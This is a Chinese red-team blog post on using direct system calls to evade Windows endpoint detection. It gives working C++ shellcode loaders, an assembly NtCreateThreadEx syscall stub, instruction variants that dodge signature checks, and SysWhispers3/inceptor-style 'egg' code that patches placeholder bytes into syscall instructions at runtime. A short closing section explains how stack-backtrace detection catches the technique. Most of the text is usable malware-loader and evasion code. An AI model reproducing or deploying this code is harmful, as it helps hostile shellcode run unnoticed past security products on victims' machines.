普通调用
#include <iostream>
#include <windows.h>
int main()
{
unsigned char shellcode[] = "";
void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof shellcode);
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, NULL);
Sleep(1000);
return 0;
}
此时的调用是非常明显的,能看到Ntdll中NtCreateThread的调用。
syscall调用
#include <iostream>
#include <Windows.h>
EXTERN_C NTSTATUS NtCreateThreadEx
(
OUT PHANDLE hThread,
IN ACCESS_MASK DesiredAccess,
IN PVOID ObjectAttributes,
IN HANDLE ProcessHandle,
IN PVOID lpStartAddress,
IN PVOID lpParameter,
IN ULONG Flags,
IN SIZE_T StackZeroBits,
IN SIZE_T SizeOfStackCommit,
IN SIZE_T SizeOfStackReserve,
OUT PVOID lpBytesBuffer
);
int main()
{
HANDLE pHandle = NULL;
HANDLE tHandle = NULL;
unsigned char shellcode[] = "";
void* exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof shellcode);
HMODULE hModule = LoadLibrary(L"ntdll.dll");
pHandle = GetCurrentProcess();
NtCreateThreadEx(&tHandle, 0x1FFFFF, NULL, pHandle, exec, NULL, FALSE,
NULL, NULL, NULL, NULL);
Sleep(1000);
CloseHandle(tHandle);
CloseHandle(pHandle);
}
通过汇编直接NtCreateThreadEx在函数种通过syscall进入ring0
.code
NtCreateThreadEx proc
mov r10,rcx
mov eax,0C5h
syscall
ret
NtCreateThreadEx endp
end
通过procmon进行监控
此时直接通过我们的主程序进入ring0
syscall的检测与绕过
ntdll中syscall被执行的格式大致
mov r10, rcx
mov eax, *syscall number*
syscall
ret
我们可以通过检测mov r10, rcx
类似的代码来确定程序是否直接进行系统调用。
但是很容易被bypass
mov r11,rcx
mov r10,r11
而且还可以写出很多不一样的写法,显然这个方式是不行的。很轻易就会被bypass。
当然也可以检测syscall指令,但是这个指令可以同int 2e中断门进0环的方式绕过,也可以加一个int 2e的规则。
objdump --disassemble -M intel "D:C++ Projectbypasssyscallx64Releasesyscall.exe" | findstr "syscall"
syscall也可以不直接写写死在文件种,比如先用垃圾指令写死在文件中,然后在运行的时候对这些垃圾指令进行修改重新为syscall,达到静态绕过的效果。
这也正是SysWhispers3为了规避检测做的升级之一,称为EGG的手段。
可以像这样编写ntapi
NtAllocateVirtualMemory PROC
mov [rsp +8], rcx ; Save registers.
mov [rsp+16], rdx
mov [rsp+24], r8
mov [rsp+32], r9
sub rsp, 28h
mov ecx, 003970B07h ; Load function hash into ECX.
call SW2_GetSyscallNumber ; Resolve function hash into syscall number.
add rsp, 28h
mov rcx, [rsp +8] ; Restore registers.
mov rdx, [rsp+16]
mov r8, [rsp+24]
mov r9, [rsp+32]
mov r10, rcx
DB 77h ; "w"
DB 0h ; "0"
DB 0h ; "0"
DB 74h ; "t"
DB 77h ; "w"
DB 0h ; "0"
DB 0h ; "0"
DB 74h ; "t"
ret
NtAllocateVirtualMemory ENDP
这个w00tw00t就是一个垃圾指令,我们将在执行的过程中重新替换为syscall
DB 77h ; "w"
DB 0h ; "0"
DB 0h ; "0"
DB 74h ; "t"
DB 77h ; "w"
DB 0h ; "0"
DB 0h ; "0"
DB 74h ; "t"
更改指令代码:
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
#include <psapi.h>
#define DEBUG 0
HMODULE GetMainModule(HANDLE);
BOOL GetMainModuleInformation(PULONG64, PULONG64);
void FindAndReplace(unsigned char[], unsigned char[]);
HMODULE GetMainModule(HANDLE hProcess)
{
HMODULE mainModule = NULL;
HMODULE* lphModule;
LPBYTE lphModuleBytes;
DWORD lpcbNeeded;
// First call needed to know the space (bytes) required to store the modules' handles
BOOL success = EnumProcessModules(hProcess, NULL, 0, &lpcbNeeded);
// We already know that lpcbNeeded is always > 0
if (!success || lpcbNeeded == 0)
{
printf("[-] Error enumerating process modulesn");
// At this point, we already know we won't be able to dyncamically
// place the syscall instruction, so we can exit
exit(1);
}
// Once we got the number of bytes required to store all the handles for
// the process' modules, we can allocate space for them
lphModuleBytes = (LPBYTE)LocalAlloc(LPTR, lpcbNeeded);
if (lphModuleBytes == NULL)
{
printf("[-] Error allocating memory to store process modules handlesn");
exit(1);
}
unsigned int moduleCount;
moduleCount = lpcbNeeded / sizeof(HMODULE);
lphModule = (HMODULE*)lphModuleBytes;
success = EnumProcessModules(hProcess, lphModule, lpcbNeeded, &lpcbNeeded);
if (!success)
{
printf("[-] Error enumerating process modulesn");
exit(1);
}
// Finally storing the main module
mainModule = lphModule[0];
// Avoid memory leak
LocalFree(lphModuleBytes);
// Return main module
return mainModule;
}
BOOL GetMainModuleInformation(PULONG64 startAddress, PULONG64 length)
{
HANDLE hProcess = GetCurrentProcess();
HMODULE hModule = GetMainModule(hProcess);
MODULEINFO mi;
GetModuleInformation(hProcess, hModule, &mi, sizeof(mi));
printf("Base Address: 0x%llun", (ULONG64)mi.lpBaseOfDll);
printf("Image Size: %un", (ULONG)mi.SizeOfImage);
printf("Entry Point: 0x%llun", (ULONG64)mi.EntryPoint);
printf("n");
*startAddress = (ULONG64)mi.lpBaseOfDll;
*length = (ULONG64)mi.SizeOfImage;
DWORD oldProtect;
VirtualProtect(mi.lpBaseOfDll, mi.SizeOfImage, PAGE_EXECUTE_READWRITE, &oldProtect);
return 0;
}
void FindAndReplace(unsigned char egg[], unsigned char replace[])
{
ULONG64 startAddress = 0;
ULONG64 size = 0;
GetMainModuleInformation(&startAddress, &size);
if (size <= 0) {
printf("[-] Error detecting main module size");
exit(1);
}
ULONG64 currentOffset = 0;
unsigned char* current = (unsigned char*)malloc(8*sizeof(unsigned char*));
size_t nBytesRead;
printf("Starting search from: 0x%llun", (ULONG64)startAddress + currentOffset);
while (currentOffset < size - 8)
{
currentOffset++;
LPVOID currentAddress = (LPVOID)(startAddress + currentOffset);
if(DEBUG > 0){
printf("Searching at 0x%llun", (ULONG64)currentAddress);
}
if (!ReadProcessMemory((HANDLE)((int)-1), currentAddress, current, 8, &nBytesRead)) {
printf("[-] Error reading from memoryn");
exit(1);
}
if (nBytesRead != 8) {
printf("[-] Error reading from memoryn");
continue;
}
if(DEBUG > 0){
for (int i = 0; i < nBytesRead; i++){
printf("%02x ", current[i]);
}
printf("n");
}
if (memcmp(egg, current, 8) == 0)
{
printf("Found at %llun", (ULONG64)currentAddress);
WriteProcessMemory((HANDLE)((int)-1), currentAddress, replace, 8, &nBytesRead);
}
}
printf("Ended search at: 0x%llun", (ULONG64)startAddress + currentOffset);
free(current);
}
在inceptor
中可以直接调用函数达到替换syscall的作用
int main(int argc, char** argv) {
unsigned char egg[] = { 0x77, 0x00, 0x00, 0x74, 0x77, 0x00, 0x00, 0x74 }; // w00tw00t
unsigned char replace[] = { 0x0f, 0x05, 0x90, 0x90, 0xC3, 0x90, 0xCC, 0xCC }; // syscall; nop; nop; ret; nop; int3; int3
//####SELF_TAMPERING####
(egg, replace);
Inject();
return 0;
}
但是这样依然很容易被检测,原因是有了更加准确的检测方式。
那就是通过栈回溯。
当你正常的程序使用系统调用的时候。
此时你的流程是主程序模块->kernel32.dll->ntdll.dll->syscall,这样当0环执行结束返回3环的时候,这个返回地址应该是在ntdll所在的地址范围之内。
那么如果是你自己直接进行系统调用。
此时当ring0返回的时候,rip将会是你的主程序模块内,而并不是在ntdll所在的范围内,这点是很容易被检测也是比较准确的一种检测方式。
加下方wx,拉你一起进群学习
往期推荐
原文始发于微信公众号(红队蓝军):syscall的检测与绕过